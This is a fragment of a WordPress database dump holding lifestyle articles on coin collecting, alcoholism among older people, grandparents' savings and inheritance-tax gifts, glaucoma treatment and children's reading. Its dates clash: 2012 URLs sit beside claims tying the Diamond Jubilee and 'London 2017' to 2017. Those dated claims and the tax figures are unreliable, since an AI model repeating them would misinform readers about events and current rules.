buy.</p>&#13;\n<p>Professor Stephen Palmer, director of the coaching psychology unit at City University, London, says: “Coins can trigger memories of happy times.</p>&#13;\n<p>“When you pick them up they can remind you of people you have had happy relationships with, which is unrelated to the coin’s monetary value.”</p>&#13;\n<p></p><div id=\"attachment_1768\" class=\"wp-caption alignright\" style=\"width: 606px\"><img class=\"size-full wp-image-1768\" title=\"Ancient Greece \" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/03/Ancient-Greece-copy.jpg\" alt=\"\" width=\"596\" height=\"412\" /><p class=\"wp-caption-text\">Ancient Greek coins were renowned for their beautiful motifs. Inset: sceat c.720 – c.745AD</p></div>&#13;\n<p>Many people also find that collecting reduces anxiety, and when they complete a collection they feel pleased with themselves, he says.</p>&#13;\n<p>There is also the thrill of the chase; collectors enjoy seeking out coins to add to their coin arsenal.</p>&#13;\n<h3>Pleasure-seekers</h3>&#13;\n<p>However, the rewards go beyond collecting itself.</p>&#13;\n<p>“There is a social side. Collectors meet and talk to other collectors, especially now they can communicate online,” says Palmer.</p>&#13;\n<p>Tony North, 62, from Yorkshire, collects Anglo-Saxon silver coins from seventh and eighth-century England. He says: “I get pleasure from sharing findings with a wide circle of numismatists. The reward is sharing a discovery with colleagues who are working towards understanding the context and significance of finds.</p>&#13;\n<p><img class=\"alignright  wp-image-1770\" title=\"K431RGrey copy\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/03/K431RGrey-copy-300x308.jpg\" alt=\"\" width=\"240\" height=\"246\" />“The variety and iconography of these tiny coins, called sceats, is remarkable. Many match the best of early Anglo-Saxon art and are inscribed with runes. We are gradually learning what the iconography and inscriptions represent.”</p>&#13;\n<p>North enjoys the historical and research aspects of coin collecting and has catalogued more than 520 main varieties and numerous sub-varieties of sceats as well as organising symposia and publishing papers on the subject.</p>&#13;\n<p>Research like this can mean coin collectors make significant contributions to history.</p>&#13;\n<p>Dr Rory Naismith, a junior research fellow in Anglo-Saxon history at Clare College, Cambridge, describes himself as a collector and a “scholar of coins”.</p>&#13;\n<p>He says: “Coins can transform our historical knowledge. We have no written documents about the state of the English economy in 650-800 AD but the number of sceats found has shown that it was pretty prosperous.”</p>&#13;\n<h3>Playground trading</h3>&#13;\n<p>Many numismatists start as children, perhaps inspired by the gift of coins from loving relatives.</p>&#13;\n<p>“Children enjoy making collections not just because of the pleasure of collecting but because it gives then a degree of power,” says Palmer.</p>&#13;\n<p>“They may collect items such as picture cards which they then talk about with other collectors and swap in the playground, which allows them to develop useful skills such as negotiation.”</p>&#13;\n<p><img class=\"alignleft  wp-image-1769\" title=\"K431grey copy\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/03/K431grey-copy-300x289.jpg\" alt=\"\" width=\"240\" height=\"231\" />Most numismatists build collections with a theme, such as examples of all the coins issued in the reign of a single monarch, or a collection of gold sovereigns through the ages.</p>&#13;\n<p>This is no mean feat, as the sovereign stretches from 1489, when King Henry VII ordered the first to be struck. At the time they were the largest and most valuable coins in England. Of course, coins mark great events as well as great figures in history – with a new English gold sovereign issued by The Royal Mint to commemorate this year’s Diamond Jubilee, restricted to 2017 only.</p>&#13;\n<p>“Whatever coins they collect, the collection becomes a project. Determined collectors have a list and enjoy ticking off items as they get them,” says William MacKay, British coins auction specialist at coin and medal dealer Spink in London.</p>&#13;\n<h3>Eye for design</h3>&#13;\n<p>Any coin can be a stepping off point for a historical journey. “For instance, coins of the Roman emperor Nero show him progressing from a young man to an old, fat, dissolute reprobate,” says MacKay.</p>&#13;\n<p><img class=\"alignright size-medium wp-image-1767\" title=\"Alfred the Great 2 copy\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/03/Alfred-the-Great-2-copy-300x400.jpg\" alt=\"\" width=\"300\" height=\"400\" />Many people collect for aesthetic reasons. Ancient Greek coins, for instance, are renowned for their high quality engraving and beautiful motifs of birds, animals and plants.</p>&#13;\n<p>Collectors need research skills to track down the coins they are looking for among the millions on offer, on dealers’ websites, in shops and at coin collectors’ fairs.</p>&#13;\n<p>They also need a knack for design. “You need to develop an eye for technical detail and condition in order to spot a good specimen,” says MacKay.</p>&#13;\n<p>Do not expect them to gleam like new pennies, however. “You can still find Roman coins with smooth, unpitted and uncorroded surfaces, though they will not be shiny,” says MacKay.</p>&#13;\n<p>Whatever coins you collect, the pleasure and sense of history they bring will be the same whether they date back to the ancient Greeks or are issued in 2017 – a year of great opportunity to start or rekindle an interest in coins as we celebrate London 2017 and the Diamond Jubilee.</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><a title=\"www.royalmint.com\" href=\"http://www.royalmint.com/\" target=\"_blank\">www.royalmint.com</a></p>&#13;\n									</div>','Cool, calm and collected','Coins offer more than just monetary value. Collecting can relieve anxiety, unearth historical findings and introduce you to a social world of like-minded people','publish','open','open','','cool-calm-and-collected','','','2018-04-02 20:07:10','2018-04-02 20:07:10','',0,'http://westonspirit.org.uk/cool-calm-and-collected.asp',0,'post','',0),(140,1,'2014-03-31 20:32:10','2014-03-31 20:32:10','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">1 April 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> dwain\" title=\"Posts by Deborah Wain\" rel=\"author\"&gt;Deborah Wain</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Drinking until you drop\" st_url=\"http://westonspirit.org.uk/2012/04/drinking-until-you-drop/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Drinking until you drop\" st_url=\"http://westonspirit.org.uk/2012/04/drinking-until-you-drop/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Drinking until you drop\" st_url=\"http://westonspirit.org.uk/2012/04/drinking-until-you-drop/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Drinking until you drop\" st_url=\"http://westonspirit.org.uk/2012/04/drinking-until-you-drop/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Drinking until you drop\" st_url=\"http://westonspirit.org.uk/2012/04/drinking-until-you-drop/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Alcoholism in older people is a growing problem and it’s not just the drinker it affects – families need support and help, too, says Deborah Wain</h4>&#13;\n<p>In his 40s, Keith* had had a brush with alcoholism, though both he and his family believed he had managed to escape its worst excesses. But as he neared 60 and retirement from his job as a senior finance officer loomed, he began drinking again – at one point downing two litre-bottles of vodka a day. By 67, he was dead.</p>&#13;\n<p>For Jeanette*, coping with her husband’s battle with alcoholism took a terrible toll on her own life and health. She was consumed by anxiety and felt she no longer knew the man she had shared a loving relationship with for 25 years.</p>&#13;\n<p>“You feel abandoned because you’ve had such a close relationship and yet it’s vanishing. I didn’t know my husband any more,” she says. “He was vacant and frightened. All his vibrancy and humour were no longer there.”</p>&#13;\n<p>Sliding into depression and finding it impossible to carry on with her job, Jeanette sought help from Al-Anon Family Groups, the national organisation that supports relatives and friends of alcoholics. She attended group meetings each weeknight and says it helped her to “recover her life and sense of herself” beyond Keith’s alcoholism.</p>&#13;\n<p><img class=\"alignright size-full wp-image-1775\" title=\"114271013\" src=\"/wp-content/uploads/2012/03/114271013.jpg\" alt=\"\" width=\"596\" height=\"387\" />The key was understanding that Keith was struggling with a chronic, progressive disease and neither he nor she were to blame, she says.</p>&#13;\n<p>“You learn that your partner is dealing with a severe illness. While the awareness doesn’t dispel the sense of loss, Al-Anon can help you to manage and accept it and remain a productive member of the family and of society.”</p>&#13;\n<p>In 2016, a report by experts from the Royal College of Psychiatrists identified alcohol abuse among older people as a growing problem, exacerbated by the fact that those affected are “invisible addicts” – because much of the drinking is done at home, including in care homes.</p>&#13;\n<p>While older people are likely to drink for the same reasons as those in other age groups, factors related to ageing – lifestyle changes due to retirement, social isolation or long-term ill-health – may trigger it.</p><div class=\"woo-sc-quote\"><p>You feel abandoned because you’ve had such a close relationship and yet it’s vanishing. I didn’t know my husband any more” – Jeanette</p></div>&#13;\n<p>Older people and those close to them face significantly more barriers than others in getting access to help with alcohol problems, according to Dr Tony Rao, Visiting Professor of Addiction in Older People at London South Bank University and a member of the group that wrote the report.</p>&#13;\n<p>“Ageism plays a part. Sometimes people think an older person has only got their drinking left in life, so why stop them? This can mean they go on drinking for many years until there is a crisis.”</p>&#13;\n<p>He is calling for improvements to care services to offer timely and prompt detection, treatment and follow-up for older people.</p>&#13;\n<p>Jeanette, 67, now helps others through Al- Anon and says: “Treatment services are hard to access, even for younger drinkers, but help is probably less available when you’re older. In Keith’s case, also, when he relapsed he was soon drinking heavily and it led quickly to a critical stage of alcoholism.</p>&#13;\n<p>“It’s so difficult, as society doesn’t see alcoholism as an illness. There’s no question of what happened to Keith being about weakness or poor character. I have the utmost respect for him and the superb husband and father he was.”</p>&#13;\n<p>Jeanette’s story is typical of those who seek Al-Anon’s services, according to a spokeswoman.</p>&#13;\n<p>“People who have a loved one who has a drinking problem tend to focus all their time, energy and resources on the drinker,” she says. “This can be isolating and draining emotionally, physically and even financially. By finding some support they will hopefully realise that they are not the only ones affected and they can bring the focus back to themselves and their own wellbeing.</p>&#13;\n<p>“It is important to remember they did not cause their loved one’s drinking, so they cannot cure or control it. Their own welfare is just as important.”</p>&#13;\n<p><em>*Names have been changed</em></p><div class=\"woo-sc-hr\"></div>&#13;\n<p><em>There are 800 Al-Anon support groups across the UK and Ireland. Visit <strong><a title=\"www.al-anonuk.org.uk\" href=\"http://www.al-anonuk.org.uk/\" target=\"_blank\">www.al-anonuk.org.uk</a></strong> or call the helpline on <strong>020 7403 0888</strong>.</em></p>&#13;\n									</div>','Drinking until you drop','704','publish','open','open','','drinking-until-you-drop','','','2018-04-02 20:07:06','2018-04-02 20:07:06','',0,'http://westonspirit.org.uk/drinking-until-you-drop.asp',0,'post','',0),(141,1,'2017-05-07 03:10:29','2017-05-07 03:10:29','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">29 April 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> mstone\" title=\"Posts by Margaret Stone\" rel=\"author\"&gt;Margaret Stone</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Feathering their nests\" st_url=\"http://westonspirit.org.uk/2012/04/feathering-their-nests/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Feathering their nests\" st_url=\"http://westonspirit.org.uk/2012/04/feathering-their-nests/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Feathering their nests\" st_url=\"http://westonspirit.org.uk/2012/04/feathering-their-nests/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Feathering their nests\" st_url=\"http://westonspirit.org.uk/2012/04/feathering-their-nests/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Feathering their nests\" st_url=\"http://westonspirit.org.uk/2012/04/feathering-their-nests/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>This spring we’ve all seen adult birds flying themselves ragged with non-stop feeding of the fledglings in the nest. That thought brings to mind today’s young parents, struggling to cope with the continuous financial demands of their children.</h4>&#13;\n<p>Enter grandparents with assistance ranging from informal childcare to structured investment and savings schemes designed specifically for children.</p>&#13;\n<p>If you decide to follow the financial help route, you can choose between a lump sum, minimum typically £500 but with additional contributions, which can be modest, or by regular savings sometimes as little as £10 a month – all in collaboration with the parents, of course.</p>&#13;\n<p>Take, for example, Junior Isas. Only a parent or guardian can open it for a child, but you can contribute to it afterwards. You’ll need the parents’ input in determining when your investment should mature – and when little Milly or Harry should be entrusted with this windfall.</p>&#13;\n<p><img class=\"aligncenter size-full wp-image-1903\" title=\"Nestegg\" src=\"/wp-content/uploads/2012/04/95296021.jpg\" alt=\"\" width=\"596\" height=\"396\" srcset=\"../../../wp-content/uploads/2012/04/95296021.jpg 596w\" sizes=\"(max-width: 596px) 100vw, 596px\" />The first thing to do is to check out that a Junior Isa has been set up for your grandchildren. The maximum annual contribution is £3,600 (rising in line with the consumer price index from next April) and is linked to the tax year, not calendar year.</p>&#13;\n<p>The money can be in either a cash or investment Isa or split, in any proportion, between the two and also switched between them. A mix of the two is appropriate for older grandchildren but for those under 12, an investment Isa only is more suitable. The money, which accumulates tax free, cannot be withdrawn until the child reaches 18. Virtually all financial services companies offer Junior Isa packages.</p>&#13;\n<p>Your check-list should include initial and annual management charges, online dealing costs and the minimum investment for both lump sums and regular savings.</p>&#13;\n<p>If the Junior Isas have been taken care of, many groups also have children’s savings plans which offer similar investment opportunities without the Isa tax benefits. The money can be held in a designated account for the child, but you remain the owner until the child is 18 and can cash it when you (or the parents wish). Alternatively, it can be set up so that child is the owner with the money held in what is known as a bare trust until the child is 18 (16 in Scotland).</p>&#13;\n<p>Skipping from short term to very long term, you could also invest for your grandchildren’s old age with a stakeholder or personal pension or a SIPP (self-invested personal pension), which can’t be taken until age 55. A child gets the same tax break as a non-earnings person and can contribute (via you) a maximum of £3,600 gross each year, of which the government pays 20 per cent by way of tax relief, thus reducing the cost to £2,800.</p>&#13;\n<p>As you are cascading wealth down the generations, what about your own position regarding inheritance tax? One annual gift of £3,000 is exempt (and you can carry an unused gift forward one year), then any number of £250 gifts can be made (but not to the £3,000 beneficiary).</p>&#13;\n<p>If you plan to save/invest regularly for the grandkids, then the most useful exemption is the “gift from normal expenditure” which provided it doesn’t affect your standard of living is normally free from inheritance tax.</p>&#13;\n									</div>','Feathering their nests','534','publish','open','open','','feathering-their-nests','','','2018-04-02 20:07:03','2018-04-02 20:07:03','',0,'http://westonspirit.org.uk/feathering-their-nests.asp',0,'post','',0),(143,1,'2016-11-03 08:10:44','2016-11-03 08:10:44','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">1 April 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Focusing on beating glaucoma\" st_url=\"http://westonspirit.org.uk/2012/04/focusing-on-beating-glaucoma/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Focusing on beating glaucoma\" st_url=\"http://westonspirit.org.uk/2012/04/focusing-on-beating-glaucoma/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Focusing on beating glaucoma\" st_url=\"http://westonspirit.org.uk/2012/04/focusing-on-beating-glaucoma/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Focusing on beating glaucoma\" st_url=\"http://westonspirit.org.uk/2012/04/focusing-on-beating-glaucoma/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Focusing on beating glaucoma\" st_url=\"http://westonspirit.org.uk/2012/04/focusing-on-beating-glaucoma/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>New laser treatments offer an effective, safe and painless alternative to treating glaucoma</h4>&#13;\n<p>Glaucoma is a degeneration of the optic nerve and a major cause of blindness, affecting more than 2 per cent of all people over 40. And if you have a family history of the condition, are shortsighted or diabetic, your risk can more than double.</p>&#13;\n<p>Skill levels at the opticians vary greatly and some use less reliable equipment (for example, the air puff pressure test), to detect the disease.</p>&#13;\n<p>Corneal thickness measurements are vital in all patients to help determine the accuracy of any pressure tests.</p>&#13;\n<p>London Ophthalmology Centre offers the latest tests in monitoring glaucoma, using state-of-the-art scanners that show more detail about the health of the eye than ever before.</p>&#13;\n<p></p><div id=\"attachment_1791\" class=\"wp-caption alignright\" style=\"width: 606px\"><img class=\"size-full wp-image-1791\" title=\"Micropulse laser in use\" src=\"/wp-content/uploads/2012/03/Picture-11.jpg\" alt=\"\" width=\"596\" height=\"262\" /><p class=\"wp-caption-text\">Micropulse laser in use</p></div>&#13;\n<p>Although there are many existing treatments, glaucoma is a chronic condition where lowering the intraocular pressure has been clearly shown to be beneficial. New laser devices such as SLT (selective laser trabeculoplasty) and Micropulse laser have allowed very safe and painless treatments to be delivered to our patients in an outpatient setting.</p>&#13;\n<p>In some cases this allows patients to cease use of daily eye-drops.</p>&#13;\n<p>Advances in micro-surgical methods, lens implants and devices allow London OC to offer higher success rates with even quicker surgeries, all performed while the patient is awake, without the need for any anaesthetic injections. New surgical micro-implants show good results with better vision while reducing the risk of complications.</p>&#13;\n<p>We are looking to a future where we screen everyone at risk, and detect the 50 per cent who do not know they have glaucoma while offering more effective treatments to all.</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><em><strong>0800 756 9993</strong></em></p>&#13;\n<p><em><strong><a title=\"www.londonoc.co.uk\" href=\"http://www.londonoc.co.uk/\" target=\"_blank\">www.londonoc.co.uk</a></strong></em></p>&#13;\n									</div>','Focusing on beating glaucoma','268','publish','open','open','','focusing-on-beating-glaucoma','','','2018-04-02 20:07:01','2018-04-02 20:07:01','',0,'http://westonspirit.org.uk/focusing-on-beating-glaucoma.asp',0,'post','',0),(144,1,'2017-06-23 20:46:06','2017-06-23 20:46:06','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">1 April 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Get Up and Go � April\" st_url=\"http://westonspirit.org.uk/2012/04/get-up-and-go-april/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Get Up and Go � April\" st_url=\"http://westonspirit.org.uk/2012/04/get-up-and-go-april/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Get Up and Go � April\" st_url=\"http://westonspirit.org.uk/2012/04/get-up-and-go-april/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Get Up and Go � April\" st_url=\"http://westonspirit.org.uk/2012/04/get-up-and-go-april/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Get Up and Go � April\" st_url=\"http://westonspirit.org.uk/2012/04/get-up-and-go-april/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<p>Check out our great ideas for health, home and lifestyle. Read our interviews with stars of the stage and screen. See what our money writers have to say about the best ways to invest your hard-earned funds.</p>&#13;\n<p>Distributed with <em>The Sunday Telegraph</em></p>&#13;\n<p><object style=\"width:610px;height:400px\"><param name=\"movie\" value=\"http://static.issuu.com/webembed/viewers/style1/v1/IssuuViewer.swf?mode=embed&amp;documentId=120330170550-016d35ca357b494a853f40a1f89dde4e&amp;docName=get-up-and-go&amp;username=Lyonsdown&amp;loadingInfoText=Get%20Up%20and%20Go&amp;backgroundColor=fff9b6&amp;layout=http%3A%2F%2Fskin.issuu.com%2Fv%2Fcolor%2Flayout.xml\" /><param name=\"allowfullscreen\" value=\"true\" /><param name=\"menu\" value=\"false\" /><embed src=\"/webembed/viewers/style1/v1/IssuuViewer.swf\" type=\"application/x-shockwave-flash\" style=\"width:610px;height:400px\" flashvars=\"mode=embed&amp;documentId=120330170550-016d35ca357b494a853f40a1f89dde4e&amp;docName=get-up-and-go&amp;username=Lyonsdown&amp;loadingInfoText=Get%20Up%20and%20Go&amp;backgroundColor=fff9b6&amp;layout=http%3A%2F%2Fskin.issuu.com%2Fv%2Fcolor%2Flayout.xml\" allowfullscreen=\"true\" menu=\"false\"></embed></object></p>&#13;\n<p><a href=\"http://www.ewartshaw.co.uk/financepublications/2012/get-up-and-go3.pdf\" target=\"_blank\">Download the PDF</a></p>&#13;\n									</div>','Get Up and Go - April','55','publish','open','open','','get-up-and-go-april','','','2018-04-02 20:07:00','2018-04-02 20:07:00','',0,'http://westonspirit.org.uk/get-up-and-go-april.asp',0,'post','',0),(145,1,'2014-06-06 22:07:49','2014-06-06 22:07:49','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">29 April 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Get Up and Go – May\" st_url=\"http://westonspirit.org.uk/2012/04/get-up-and-go-may/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Get Up and Go – May\" st_url=\"http://westonspirit.org.uk/2012/04/get-up-and-go-may/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Get Up and Go – May\" st_url=\"http://westonspirit.org.uk/2012/04/get-up-and-go-may/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Get Up and Go – May\" st_url=\"http://westonspirit.org.uk/2012/04/get-up-and-go-may/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Get Up and Go – May\" st_url=\"http://westonspirit.org.uk/2012/04/get-up-and-go-may/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<p>Check out our great ideas for health, home and lifestyle. Read our interviews with stars of the stage and screen. See what our money writers have to say about the best ways to invest your hard-earned funds.</p>&#13;\n<p>Distributed with <em>The Sunday Telegraph </em></p>&#13;\n<p><object style=\"width:610px;height:400px\"><param name=\"movie\" value=\"http://static.issuu.com/webembed/viewers/style1/v1/IssuuViewer.swf?mode=embed&amp;documentId=120427134050-db06dc88a4dc48ecae23e4da6bed8bab&amp;docName=guag4_final&amp;username=Lyonsdown&amp;loadingInfoText=GUAG4&amp;backgroundColor=fff9b6&amp;layout=http%3A%2F%2Fskin.issuu.com%2Fv%2Fcolor%2Flayout.xml\" /><param name=\"allowfullscreen\" value=\"true\" /><param name=\"menu\" value=\"false\" /><embed src=\"/webembed/viewers/style1/v1/IssuuViewer.swf\" type=\"application/x-shockwave-flash\" style=\"width:610px;height:400px\" flashvars=\"mode=embed&amp;documentId=120427134050-db06dc88a4dc48ecae23e4da6bed8bab&amp;docName=guag4_final&amp;username=Lyonsdown&amp;loadingInfoText=GUAG4&amp;backgroundColor=fff9b6&amp;layout=http%3A%2F%2Fskin.issuu.com%2Fv%2Fcolor%2Flayout.xml\" allowfullscreen=\"true\" menu=\"false\"></embed></object></p>&#13;\n<p><a title=\"Download the PDF\" href=\"http://www.ewartshaw.co.uk/financepublications/2012/get-up-and-go4.pdf\" target=\"_blank\">Download the PDF </a></p>&#13;\n									</div>','Get Up and Go – May','55','publish','open','open','','get-up-and-go-may','','','2018-04-02 20:06:58','2018-04-02 20:06:58','',0,'http://westonspirit.org.uk/get-up-and-go-may.asp',0,'post','',0),(146,1,'2015-06-19 04:54:05','2015-06-19 04:54:05','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">29 April 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Grow your own bookworm\" st_url=\"http://westonspirit.org.uk/2012/04/grow-your-own-bookworm/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Grow your own bookworm\" st_url=\"http://westonspirit.org.uk/2012/04/grow-your-own-bookworm/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Grow your own bookworm\" st_url=\"http://westonspirit.org.uk/2012/04/grow-your-own-bookworm/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Grow your own bookworm\" st_url=\"http://westonspirit.org.uk/2012/04/grow-your-own-bookworm/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Grow your own bookworm\" st_url=\"http://westonspirit.org.uk/2012/04/grow-your-own-bookworm/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Once upon a time, young minds were excited by the written word. With their grandparents’ help, the story can have a happy ending even in today’s multimedia world</h4>&#13;\n<p>My favourite remark about reading came from a nine-year-old who’d just seen the movie version of CS Lewis’s The Lion, the Witch and the Wardrobe. “It was excellent!” she beamed.</p>&#13;\n<p><img class=\"alignright  wp-image-1881\" title=\"iStock_000007030821Medium\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/04/iStock_000007030821Medium.jpg\" alt=\"\" width=\"321\" height=\"448\" srcset=\"http://westonspirit.org.uk/wp-content/uploads/2012/04/iStock_000007030821Medium.jpg 596w\" sizes=\"(max-width: 321px) 100vw321px\" /></p>&#13;\n<p>“As good as the book?” I asked.</p>&#13;\n<p>“Not that good, no.”</p>&#13;\n<p>“Why not?”</p>&#13;\n<p>She looked at me as if I were mad.“Because when I’m reading a book the pictures in my head are better,” she said.</p>&#13;\n<p>All book-lovers know what she meant. What we see on screen or on stage – the apple barrel scene in Treasure Island, say – often falls a long way short of the version we first encountered on the page.</p>&#13;\n<p>Of course, there’s no mystery about this. The right picture can be worth a thousand words, but the right words can also be worth a thousand pictures – thanks to the room they allow our imagination. The best children’s authors exploit this brilliantly. Here’s Roald Dahl on a roll:</p>&#13;\n<div class=\"woo-sc-quote\"><p>He was so short his chin would have been under water in the shallow end of any swimming pool in the world.</p></div>&#13;\n<p>Wow! This gives the reader of Fantastic Mr Fox a perfect fix on Farmer Bunce’s child-like height.</p>&#13;\n<p>Words can work on a big-scale, too. When the Space-Bat-Angel-Dragon in Ted Hughes’s The Iron Man is hurtling towards the earth from outer space, the author doesn’t spare his young reader’s feelings about the horror of what’s going to happen:</p>&#13;\n<div class=\"woo-sc-quote\"><p>. . . if it hit the world at that speed, why, the whole world would simply be blasted to bits in the twinkling of an eye. It would be like an express train hitting a bowl of goldfish.</p></div>&#13;\n<p><img class=\"alignleft  wp-image-1885\" title=\"9780141333205H\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/04/9780141333205H-300x421.jpg\" alt=\"\" width=\"210\" height=\"295\" srcset=\"http://westonspirit.org.uk/wp-content/uploads/2012/04/9780141333205H-300x421.jpg 300w\" sizes=\"(max-width: 210px) 100vw210px\" />Eat your hearts out, designers of special effects.</p>&#13;\n<p>Writing as good as this isn’t just enjoyable, it’s mind-expanding. No wonder reading just for the fun of it is recognised the world over as a key predictor of a child’s educational success.</p>&#13;\n<p>Beware, though. It has to be just for the fun of it. Any hint of compulsion and the pleasure stops in its tracks. A relish for the magic of words can only be caught, not taught.</p>&#13;\n<p>That’s the trouble. These days, what with Sats, Ofsted inspections, league tables and an ever-proliferating curriculum, teachers are hard-pushed to establish the basics of reading let alone foster its delights. And with most parents up to their eyes in simply keeping their family afloat, who has the time and inclination to show kids that both activities can be a blast?</p>&#13;\n<p>Well, if you’re a grandparent, it could be you.</p>&#13;\n<p>OK, I know what you’re thinking. What do you know about current children’s books? Come to that, what do you know about current kids? Haven’t both moved on a bit in recent years?</p>&#13;\n<p><img class=\"alignright  wp-image-1883\" title=\"9781405210935\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/04/9781405210935-300x460.jpg\" alt=\"\" width=\"192\" height=\"294\" srcset=\"http://westonspirit.org.uk/wp-content/uploads/2012/04/9781405210935-300x460.jpg 300w\" sizes=\"(max-width: 192px) 100vw192px\" />Well, maybe they have, superficially, but our aim should be the same as it always was: to build a three-way relationship between a kid, a grown-up and a story. My advice is begin with the story. Here’s my own favourite start-up for a three- to five-year-old:</p>&#13;\n<div class=\"woo-sc-quote\"><p>Plop was a baby barn owl, and he lived with his Mummy and Daddy at the top of a very tall tree in a field. Plop was fat and fluffy. He had a beautiful heart-shaped ruff. He had enormous, round eyes. He had very knackety knees. In fact he was exactly the same as every baby barn owl that has ever been – except for one thing. Plop was afraid of the dark.</p></div>&#13;\n<p>Jill Tomlinson’s The Owl Who Was Afraid of the Dark offers the literary equivalent of what musicians call perfect pitch. Any adult who reads it will be itching to find a youngster – any youngster – who wants to share it.</p>&#13;\n<p>For me, if it goes on to initiate fun for life, it’s the best possible gift a grandparent can give his or her grandchild.</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><em><strong>Chris Powling</strong>, 69, has four grandchildren and is the author of more than 90 books for children. Rainbow Boots will be published by A&amp;C Black in September.</em></p>&#13;\n									</div>','Grow your own bookworm','686','publish','open','open','','grow-your-own-bookworm','','','2018-04-02 20:06:56','2018-04-02 20:06:56','',0,'http://westonspirit.org.uk/grow-your-own-bookworm.asp',0,'post','',0),(147,1,'2014-04-18 03:26:19','2014-04-18 03:26:19','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">1 April 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Have something to smile about\" st_url=\"http://westonspirit.org.uk/2012/04/have-something-to-smile-about/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Have something to smile about\" st_url=\"http://westonspirit.org.uk/2012/04/have-something-to-smile-about/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Have something to smile about\" st_url=\"http://westonspirit.org.uk/2012/04/have-something-to-smile-about/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Have something to smile about\" st_url=\"http://westonspirit.org.uk/2012/04/have-something-to-smile-about/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Have something to smile about\" 